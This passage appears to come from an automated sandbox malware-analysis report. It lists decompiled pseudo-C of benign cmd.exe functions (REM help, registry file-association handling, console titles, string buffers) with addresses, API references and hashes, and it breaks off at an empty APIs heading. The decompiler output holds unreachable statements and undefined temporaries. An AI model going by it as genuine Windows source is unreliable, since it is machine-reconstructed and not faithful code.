0x00dab3d2
0x00dab3d5
0x00dab3db
0x00dab3db
0x00dab3dd
0x00dab3e5
0x00dab3e9
0x00dab3eb
0x00dab3f7
0x00dab402
0x00dab404
0x00dab408
0x00dab41d
0x00dab41f
0x00dab40a
0x00dab40c
0x00dab40d
0x00dab416
0x00dab416
0x00dab426
0x00dab42c
0x00dab431
0x00dab436
0x00dab438
0x00dab43e
0x00dab444
0x00dab44a
0x00dab44a
0x00dab44c
0x00dab44e
0x00dab4b9
0x00dab4b9
0x00dab4c0
0x00dab4c5
0x00000000
0x00dab4c5
0x00dab454
0x00dab465
0x00dab465
0x00dab468
0x00dab46e
0x00dab479
0x00dab47e
0x00dab481
0x00dab483
0x00dab486
0x00dab486
0x00dab489
0x00dab48c
0x00dab499
0x00dab49e
0x00dab4aa
0x00dab4b4
0x00dab4a0
0x00dab4a2
0x00dab4a2
0x00000000
0x00dab49e
0x00dab470
0x00dab470
0x00dab473
0x00dab473
0x00000000
0x00dab473
0x00dab456
0x00dab457
0x00dab45f
0x00000000
0x00000000
0x00dab461
0x00000000
0x00dab461
0x00dab3d7
0x00dab3d9
0x00dab3e2
0x00000000
0x00dab3e2
0x00000000
0x00dab3d9
0x00dab2f2
0x00dab2fa
0x00000000
0x00000000
0x00dab2fc
0x00dab301
0x00dab307
0x00000000

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

wcschr.MSVCRT ref: 00DAB377
memcpy.MSVCRT ref: 00DAB3F7

Strings

&()[]{}^=;!%'+,`~, xrefs: 00DAB372

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$AllocProcessmemcpywcschr
String ID: &()[]{}^=;!%'+,`~
API String ID: 3241892172-381716982
Opcode ID: fb7a91435e3d2d19ae00b56b1a9bad3632ca2b1ed302e1d7970721f226703d9d
Instruction ID: 65878563506591e443eb3b5077cdc6f888cf4d8eabb0abce7dd6680b98637075
Opcode Fuzzy Hash: fb7a91435e3d2d19ae00b56b1a9bad3632ca2b1ed302e1d7970721f226703d9d
Instruction Fuzzy Hash: 5D611971E04215CFCF18CF68D8905ADB7F2FB4A324B24452BE856E7752EB7099428B74

Uniqueness

Uniqueness Score: -1.00%

Function 00D8DE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00D8DE4F(void* __eax, short* __ebx, void* __ecx) {
				void* __edi;
				short _t8;
				short _t9;
				intOrPtr _t18;
				short* _t24;
				long _t29;
				void* _t32;
				void* _t37;
				void* _t41;
				short _t42;
				void* _t46;
				intOrPtr* _t47;

				_t24 = __ebx;
				_t42 = 0;
				__imp___wcsicmp(L"REM/?", 0xdbfaa0, _t41, _t46, __ecx);
				_t50 = __eax;
				if(__eax == 0) {
					 *0xdbfaa6 = 0;
					_t42 = 1;
				}
				_t29 = 0x2d;
				_t47 = E00D8E9A0(_t29, _t50);
				if(_t42 != 0) {
					_t8 = 0x2f;
					 *0xdbfaa0 = _t8;
					_t9 = 0x3f;
					 *0xdbfaa2 = _t9;
					 *0xdbfaa4 = 0;
				} else {
					E00D8F030(0);
				}
				_t37 = 0x2d;
				if(E00D8DCE1(_t24, _t37, _t42) != 0) {
					 *(_t47 + 0x38) =  *(_t47 + 0x38) & 0x00000000;
					 *_t47 = 0x3c;
					goto L8;
				} else {
					E00D8F300(_t11, 0, 0, 0);
					if(E00D8EEC8() == 0) {
						L8:
						return _t47;
					} else {
						_t32 = 0x20;
						if(E00D8F030(_t32) != 0x4000) {
							E00D8F300(_t15, 0, 0, 0);
							goto L8;
						} else {
							_t34 =  *0xdbfa8c +  *0xdbfa8c;
							_t18 = E00D900B0( *0xdbfa8c +  *0xdbfa8c);
							if(_t18 == 0) {
								E00DA9287(_t34);
								__imp__longjmp(0xdbb8b8, 1);
								asm("int3");
								__eflags = _t47;
								if(_t47 != 0) {
									 *_t24 = 0;
								}
								return _t24;
							} else {
								 *((intOrPtr*)(_t47 + 0x3c)) = _t18;
								E00D91040(_t18,  *0xdbfa8c, 0xdbfaa0);
								goto L8;
							}
						}
					}
				}
			}

0x00d8de4f
0x00d8de5e
0x00d8de60
0x00d8de68
0x00d8de6a
0x00d9bcac
0x00d9bcb2
0x00d9bcb2
0x00d8de72
0x00d8de78
0x00d8de7c
0x00d9bcba
0x00d9bcbb
0x00d9bcc3
0x00d9bcc4
0x00d9bccc
0x00d8de82
0x00d8de84
0x00d8de84
0x00d8de8b
0x00d8de93
0x00d9bcd7
0x00d9bcdb
0x00000000
0x00d8de99
0x00d8de9f
0x00d8deab
0x00d8dee6
0x00d8deeb
0x00d8dead
0x00d8deaf
0x00d8deba
0x00d8def2
0x00000000
0x00d8debc
0x00d8dec1
0x00d8dec4
0x00d8decb
0x00d9bce6
0x00d9bcf2
0x00d9bcf8
0x00d9bcf9
0x00d9bcfb
0x00d9bd03
0x00d9bd03
0x00d8dfb5
0x00d8ded1
0x00d8dede
0x00d8dee1
0x00000000
0x00d8dee1
0x00d8decb
0x00d8deba
0x00d8deab

APIs

_wcsicmp.MSVCRT ref: 00D8DE60

Part of subcall function 00D8F300: _setjmp3.MSVCRT ref: 00D8F318
Part of subcall function 00D8F300: iswspace.MSVCRT ref: 00D8F35B
Part of subcall function 00D8F300: wcschr.MSVCRT ref: 00D8F37D
Part of subcall function 00D8F300: iswdigit.MSVCRT ref: 00D8F3DE

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

longjmp.MSVCRT(00DBB8B8,00000001,00000000), ref: 00D9BCF2

Strings

REM/?, xrefs: 00D8DE59

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
String ID: REM/?
API String ID: 1631155197-4093888634
Opcode ID: 8f25cbc4c32b87295ab687fd43906fed9d2f375b21c3b406a76f9f5e64ca1fd4
Instruction ID: f0229459a8b980aa5061b817f671791886ca9303a8c4b3482315b62d76461370
Opcode Fuzzy Hash: 8f25cbc4c32b87295ab687fd43906fed9d2f375b21c3b406a76f9f5e64ca1fd4
Instruction Fuzzy Hash: 3D21B322310341DAEB69BB36AD06B377396DF80760F24443BF546DA2D1EEB0C8458735

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00DA4A29(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t33;
				intOrPtr _t34;
				signed int _t57;
				signed int _t59;
				long _t61;
				void* _t62;

				_push(0x1c);
				_push(0xdac120);
				E00D97678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t62 - 0x2c)) = __ecx;
				_t59 = 0;
				 *((intOrPtr*)(_t62 - 0x24)) = 0;
				_t37 = 0;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				_t61 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t62 - 0x20);
				 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
				if(_t61 == 0) {
					_t24 = E00D8EA40( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t62 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t62 - 4)) = 0;
					if( *_t24 != 0) {
						_t59 = E00D8DF40(E00D922C0(0, _t24));
						 *((intOrPtr*)(_t62 - 0x24)) = _t59;
						__eflags = _t59;
						if(_t59 != 0) {
							_t46 =  *(E00D8D7E6( *((intOrPtr*)(_t62 - 0x2c)))) & 0x0000ffff;
							__eflags = _t46;
							if(_t46 != 0) {
								__eflags = _t46 - 0x3d;
								if(_t46 == 0x3d) {
									 *((intOrPtr*)(_t62 - 0x2c)) = E00D8D7E6(_t29);
									_t37 = E00D8DF40(E00D922C0(0, _t30));
									 *((intOrPtr*)(_t62 - 0x28)) = _t37;
									__eflags = _t37;
									if(_t37 != 0) {
										_t33 = E00D8D7E6( *((intOrPtr*)(_t62 - 0x2c)));
										_t46 = 0;
										__eflags =  *_t33;
										if(__eflags == 0) {
											_t34 = E00DA587B(_t37,  *(_t62 - 0x20), _t59, _t59, _t61, __eflags, _t37);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E00D8C5A2(_t46);
								}
							} else {
								_t57 = _t59;
								goto L3;
							}
						}
					} else {
						_t57 = 0;
						L3:
						_t34 = E00DA4B4E( *(_t62 - 0x20), _t57);
						L14:
						_t61 = _t34;
						 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
					}
					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
					E00DA4B3F(_t37, _t59);
					RegCloseKey( *(_t62 - 0x20));
					_t22 = _t61;
				}
				return E00D976BD(_t22);
			}

0x00da4a29
0x00da4a2b
0x00da4a30
0x00da4a35
0x00da4a3a
0x00da4a3c
0x00da4a3f
0x00da4a41
0x00da4a5e
0x00da4a60
0x00da4a65
0x00da4a78
0x00da4a7d
0x00da4a82
0x00da4a88
0x00da4aa4
0x00da4aa6
0x00da4aa9
0x00da4aab
0x00da4ab5
0x00da4ab8
0x00da4abb
0x00da4ac1
0x00da4ac4
0x00da4add
0x00da4aee
0x00da4af0
0x00da4af3
0x00da4af5
0x00da4afa
0x00da4aff
0x00da4b01
0x00da4b04
0x00da4b0f
0x00000000
0x00da4b06
0x00da4b06
0x00000000
0x00da4b06
0x00da4b04
0x00da4ac6
0x00da4ac6
0x00da4ac8
0x00da4ac8
0x00da4acd
0x00da4ad3
0x00da4abd
0x00da4abd
0x00000000
0x00da4abd
0x00da4abb
0x00da4a8a
0x00da4a8a
0x00da4a8c
0x00da4a8f
0x00da4b14
0x00da4b14
0x00da4b16
0x00da4b16
0x00da4b19
0x00da4b20
0x00da4b28
0x00da4b2e
0x00da4b2e
0x00da4b35

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00DAC120,0000001C,00DA5CB1), ref: 00DA4A58

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00DA4B28

Part of subcall function 00DA587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA58AF
Part of subcall function 00DA587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0), ref: 00DA58E5
Part of subcall function 00DA587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA58F3

Strings

Software\Classes, xrefs: 00DA4A4E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$Close$CreateOpenValueiswspace
String ID: Software\Classes
API String ID: 1047774138-1656466771
Opcode ID: 6278927984fb0734996031a4b4df924d32c728500b50bdcad826803ee502e795
Instruction ID: 04045398f3cee3f987fec0aa91e041a777e33299ff1bf4d365727fdb4ff87a19
Opcode Fuzzy Hash: 6278927984fb0734996031a4b4df924d32c728500b50bdcad826803ee502e795
Instruction Fuzzy Hash: 18314C31E442159FCF18FBB99851AADB6B2EF89700F24402EE006B72D1EAB49D008B74

Uniqueness

Uniqueness Score: -1.00%

Function 00DA51C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00DA51C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t32;
				intOrPtr _t33;
				signed int _t55;
				signed int _t57;
				long _t59;
				void* _t60;

				_push(0x1c);
				_push(0xdac0c0);
				E00D97678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x2c)) = __ecx;
				_t57 = 0;
				 *((intOrPtr*)(_t60 - 0x24)) = 0;
				_t36 = 0;
				 *((intOrPtr*)(_t60 - 0x28)) = 0;
				_t59 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t60 - 0x20);
				 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
				if(_t59 == 0) {
					_t24 = E00D8EA40( *((intOrPtr*)( *((intOrPtr*)(_t60 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t60 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t60 - 4)) = 0;
					if( *_t24 != 0) {
						_t57 = E00D8DF40(E00D922C0(0, _t24));
						 *((intOrPtr*)(_t60 - 0x24)) = _t57;
						if(_t57 != 0) {
							_t45 =  *(E00D8D7E6( *((intOrPtr*)(_t60 - 0x2c)))) & 0x0000ffff;
							if(_t45 != 0) {
								if(_t45 == 0x3d) {
									 *((intOrPtr*)(_t60 - 0x2c)) = E00D8D7E6(_t29);
									_t36 = E00D8DF40(_t30);
									 *((intOrPtr*)(_t60 - 0x28)) = _t36;
									if(_t36 != 0) {
										_t32 = E00D8D7E6( *((intOrPtr*)(_t60 - 0x2c)));
										_t45 = 0;
										if( *_t32 == 0) {
											_t33 = E00DA59E6( *(_t60 - 0x20), _t57, _t36);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E00D8C5A2(_t45);
								}
							} else {
								_t55 = _t57;
								goto L3;
							}
						}
					} else {
						_t55 = 0;
						L3:
						_t33 = E00DA4CF0( *(_t60 - 0x20), _t55);
						L14:
						_t59 = _t33;
						 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
					}
					 *((intOrPtr*)(_t60 - 4)) = 0xfffffffe;
					E00DA52D4(_t36, _t57);
					RegCloseKey( *(_t60 - 0x20));
					_t22 = _t59;
				}
				return E00D976BD(_t22);
			}

0x00da51c5
0x00da51c7
0x00da51cc
0x00da51d1
0x00da51d6
0x00da51d8
0x00da51db
0x00da51dd
0x00da51fa
0x00da51fc
0x00da5201
0x00da5214
0x00da5219
0x00da521e
0x00da5224
0x00da5240
0x00da5242
0x00da5247
0x00da5251
0x00da5257
0x00da5260
0x00da5279
0x00da5283
0x00da5285
0x00da528a
0x00da528f
0x00da5294
0x00da5299
0x00da52a4
0x00000000
0x00da529b
0x00da529b
0x00000000
0x00da529b
0x00da5299
0x00da5262
0x00da5262
0x00da5264
0x00da5264
0x00da5269
0x00da526f
0x00da5259
0x00da5259
0x00000000
0x00da5259
0x00da5257
0x00da5226
0x00da5226
0x00da5228
0x00da522b
0x00da52a9
0x00da52a9
0x00da52ab
0x00da52ab
0x00da52ae
0x00da52b5
0x00da52bd
0x00da52c3
0x00da52c3
0x00da52ca

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00DAC0C0,0000001C,00DA5CE1), ref: 00DA51F4

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00DA52BD

Strings

Software\Classes, xrefs: 00DA51EA

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$CloseOpeniswspace
String ID: Software\Classes
API String ID: 2439148603-1656466771
Opcode ID: 85f1d1ebeed1d01239ba39c7085588662a8dd7ede9b84db855e93a3ffd6b3569
Instruction ID: 5619de145cdb5749ae13fcc5afca3e59a6eac7887e5abf99beba61c62b398010
Opcode Fuzzy Hash: 85f1d1ebeed1d01239ba39c7085588662a8dd7ede9b84db855e93a3ffd6b3569
Instruction Fuzzy Hash: E9219331E14705DBDF18BBB89851AADB7B2EF89710F24402DE406BB3D9EA744D008B78

Uniqueness

Uniqueness Score: -1.00%

Function 00D9100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9100C(long __eax, intOrPtr* __ecx) {
				intOrPtr _v8;
				signed int _v12;
				long _t13;
				intOrPtr _t14;
				signed int _t15;
				short _t21;
				signed int _t24;
				intOrPtr* _t26;
				intOrPtr* _t29;
				WCHAR* _t35;
				long _t40;
				intOrPtr _t43;
				short* _t44;
				WCHAR* _t47;
				void* _t48;
				WCHAR* _t49;

				_t13 = __eax;
				_t26 = __ecx;
				if(__ecx != 0 &&  *0xdc3cc4 == 0 &&  *0xdc3ccc == 0) {
					_t13 = E00D900B0(0x20c);
					_t47 = _t13;
					if(_t47 != 0) {
						_t13 = GetConsoleTitleW(_t47, 0x104);
						_t40 = _t13;
						if(_t40 != 0) {
							_v12 = _v12 & 0x00000000;
							_t29 = _t26;
							_t3 = _t29 + 2; // 0x2
							_t48 = _t3;
							do {
								_t14 =  *_t29;
								_t29 = _t29 + 2;
							} while (_t14 != _v12);
							_t15 =  *0xdad570; // 0x0
							_t17 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_v8 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_t49 = E00D90100(_t47, _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa + _t17);
							if(_t49 == 0) {
								L16:
								return E00D90040(_t47);
							}
							_t47 = _t49;
							_t43 = _v8;
							if( *0xdad59c == 0) {
								E00D918C0(_t49, _t43, L" - ");
								_t35 = _t49;
								_t10 =  &(_t35[1]); // 0x2
								_t44 = _t10;
								do {
									_t21 =  *_t35;
									_t35 =  &(_t35[1]);
								} while (_t21 != _v12);
								 *0xdad570 = _t35 - _t44 >> 1;
								E00D918C0(_t49, _v8, _t26);
								 *0xdad59c = 1;
								L15:
								SetConsoleTitleW(_t49);
								goto L16;
							}
							_t24 =  *0xdad570; // 0x0
							E00D91040( &(_t49[_t24]), _t43 - _t24, _t26);
							goto L15;
						}
					}
				}
				return _t13;
			}

0x00d9100c
0x00d91015
0x00d9101b
0x00d9cdca
0x00d9cdcf
0x00d9cdd3
0x00d9cddf
0x00d9cde5
0x00d9cde9
0x00d9cdef
0x00d9cdf3
0x00d9cdf5
0x00d9cdf5
0x00d9cdf8
0x00d9cdf8
0x00d9cdfb
0x00d9cdfe
0x00d9ce04
0x00d9ce14
0x00d9ce16
0x00d9ce21
0x00d9ce25
0x00d9ce87
0x00000000
0x00d9ce89
0x00d9ce2e
0x00d9ce30
0x00d9ce33
0x00d9ce4e
0x00d9ce53
0x00d9ce55
0x00d9ce55
0x00d9ce58
0x00d9ce58
0x00d9ce5b
0x00d9ce5e
0x00d9ce6b
0x00d9ce74
0x00d9ce79
0x00d9ce80
0x00d9ce81
0x00000000
0x00d9ce81
0x00d9ce35
0x00d9ce40
0x00000000
0x00d9ce40
0x00d9cde9
0x00d9cdd3
0x00d9102c

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00D90B7F), ref: 00D9CDDF
SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00D9CE81

Strings

- , xrefs: 00D9CE47

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: b8629098cf63537bd82d9ab0d06615fa3cd4385d4934dd2333a20df49c0dbd08
Instruction ID: 9b1998646128f7096e1b4c3a7c5ffcebba86988ff7fbd7ea994cb481a7b4a2aa
Opcode Fuzzy Hash: b8629098cf63537bd82d9ab0d06615fa3cd4385d4934dd2333a20df49c0dbd08
Instruction Fuzzy Hash: 09213836A002029BCF25AB6CD855B7E77B2EB85700F1C452DE80B97354EF359D4687B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA8430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00DA8430(void* __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				void* _t14;
				void* _t26;
				void* _t31;

				_t26 = __edx;
				_t25 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_t31 = 0x64;
				} else {
					_t31 = E00D98100(E00D981B0(_a12, _a16, 0x64, 0), _t26, _a4, _a8);
				}
				_t23 = L"%3d";
				E00D9274C(0xdc3d00, 0x104, L"%3d", _t31);
				E00D8C108(_t25, 0x40002722, 1, 0xdc3d00);
				if( *0xdad544 == 0) {
					_t14 = 0;
				} else {
					E00D9274C(0xdc3d00, 0x104, _t23, _t31);
					E00D8C108(_t25, 0x40002722, 1, 0xdc3d00);
					printf("\n");
					_t14 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t14;
			}

0x00da8430
0x00da8430
0x00da8435
0x00da8436
0x00da8440
0x00da8464
0x00da8442
0x00da845e
0x00da845e
0x00da8466
0x00da8477
0x00da8484
0x00da8493
0x00da84c8
0x00da8495
0x00da849d
0x00da84aa
0x00da84b4
0x00da84c5
0x00da84c5
0x00da84d0

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA8459
printf.MSVCRT ref: 00DA84B4

Strings

%3d, xrefs: 00DA8466, 00DA8470, 00DA8496

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
String ID: %3d
API String ID: 2845598586-2138283368
Opcode ID: 6b6312f6cebd13519f4b6b89cac8d430d5d7046b4b16e1b2fd6f74f127816901
Instruction ID: 12f867f8d2cd08507bce43faccdb317d2b04d5ba2c5758521d60245776f00f34
Opcode Fuzzy Hash: 6b6312f6cebd13519f4b6b89cac8d430d5d7046b4b16e1b2fd6f74f127816901
Instruction Fuzzy Hash: E3012DB1550305BBEB207B519C8AFEB3A9EDB86FA0F004018FE09A5191D5B19C50D371

Uniqueness

Uniqueness Score: -1.00%

Function 00D90C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00D90C70(void* __ecx, int _a4) {
				void* _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t35 = __ecx;
				_t34 = _a4;
				_t39 = _t34 -  *((intOrPtr*)(__ecx + 0x210));
				if(_t34 <=  *((intOrPtr*)(__ecx + 0x210))) {
					L6:
					return 0;
				}
				_push(0xd8262a);
				_t24 = E00D972B5(_t23, _t34, __ecx, _t39,  ~(0 | _t39 > 0x00000000) | _t34 * 0x00000002);
				_t37 = _t36 + 8;
				if(_t24 == 0) {
					E00DA292C("onecore\\base\\cmd\\maxpathawarestring.cpp", 0x8007000e);
					return 0x8007000e;
				}
				_t20 =  *(_t35 + 0x208);
				if(_t24 != _t20) {
					__imp__??_V@YAXPAX@Z(_t20);
					_t37 = _t37 + 4;
					 *(_t35 + 0x208) = _t24;
				}
				_t21 =  *(_t35 + 0x208);
				 *(_t35 + 0x210) = _t34;
				if(_t21 == 0) {
					_t21 = _t35;
				}
				memset(_t21, 0, _t34);
				goto L6;
			}

0x00d90c77
0x00d90c7a
0x00d90c7d
0x00d90c83
0x00d90ce5
0x00000000
0x00d90ce5
0x00d90c90
0x00d90ca2
0x00d90ca4
0x00d90ca9
0x00d9cd56
0x00000000
0x00d9cd5b
0x00d90caf
0x00d90cb7
0x00d90cba
0x00d90cc0
0x00d90cc3
0x00d90cc3
0x00d90cc9
0x00d90ccf
0x00d90cd7
0x00d90cee
0x00d90cee
0x00d90cdd
0x00000000

APIs

Part of subcall function 00D972B5: __EH_prolog3_catch.LIBCMT ref: 00D97650

??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
memset.MSVCRT ref: 00D90CDD

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00D9CD51

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: H_prolog3_catchmemset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 620422817-3416068913
Opcode ID: 24d82d5782091f9565796f6d26247b09a5989924ec85a1dc196aededa06b53d7
Instruction ID: 822d32ee5c1f5a6921a6bf68c848d807de3bcc102b50ece70241198de17a3fae
Opcode Fuzzy Hash: 24d82d5782091f9565796f6d26247b09a5989924ec85a1dc196aededa06b53d7
Instruction Fuzzy Hash: 7B01F772300304AFDB209679EC4AF6BB6D9EB80750F14063AF55AD7340DAB6EC80C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D8DEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D8DEF9(signed short* __ecx) {
				long _t9;
				signed short* _t11;

				_t11 = __ecx;
				if(__ecx != 0) {
					while(1) {
						_t9 =  *_t11 & 0x0000ffff;
						if(iswspace(_t9) != 0) {
							goto L6;
						}
						L3:
						if(wcschr(L"=,;", _t9) != 0) {
							if(_t9 == 0) {
								goto L4;
							} else {
								L7:
								_t11 =  &(_t11[1]);
								continue;
							}
							L10:
						}
						L4:
						goto L5;
						L6:
						if(_t9 == 0xa) {
							goto L3;
						} else {
							goto L7;
						}
						goto L5;
					}
				}
				L5:
				return _t11;
				goto L10;
			}

0x00d8defc
0x00d8df00
0x00d8df03
0x00d8df03
0x00d8df10
0x00000000
0x00000000
0x00d8df12
0x00d8df22
0x00d8df36
0x00000000
0x00d8df38
0x00d8df2e
0x00d8df2e
0x00000000
0x00d8df2e
0x00000000
0x00d8df36
0x00d8df24
0x00000000
0x00d8df29
0x00d8df2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8df2c
0x00d8df03
0x00d8df25
0x00d8df28
0x00000000

APIs

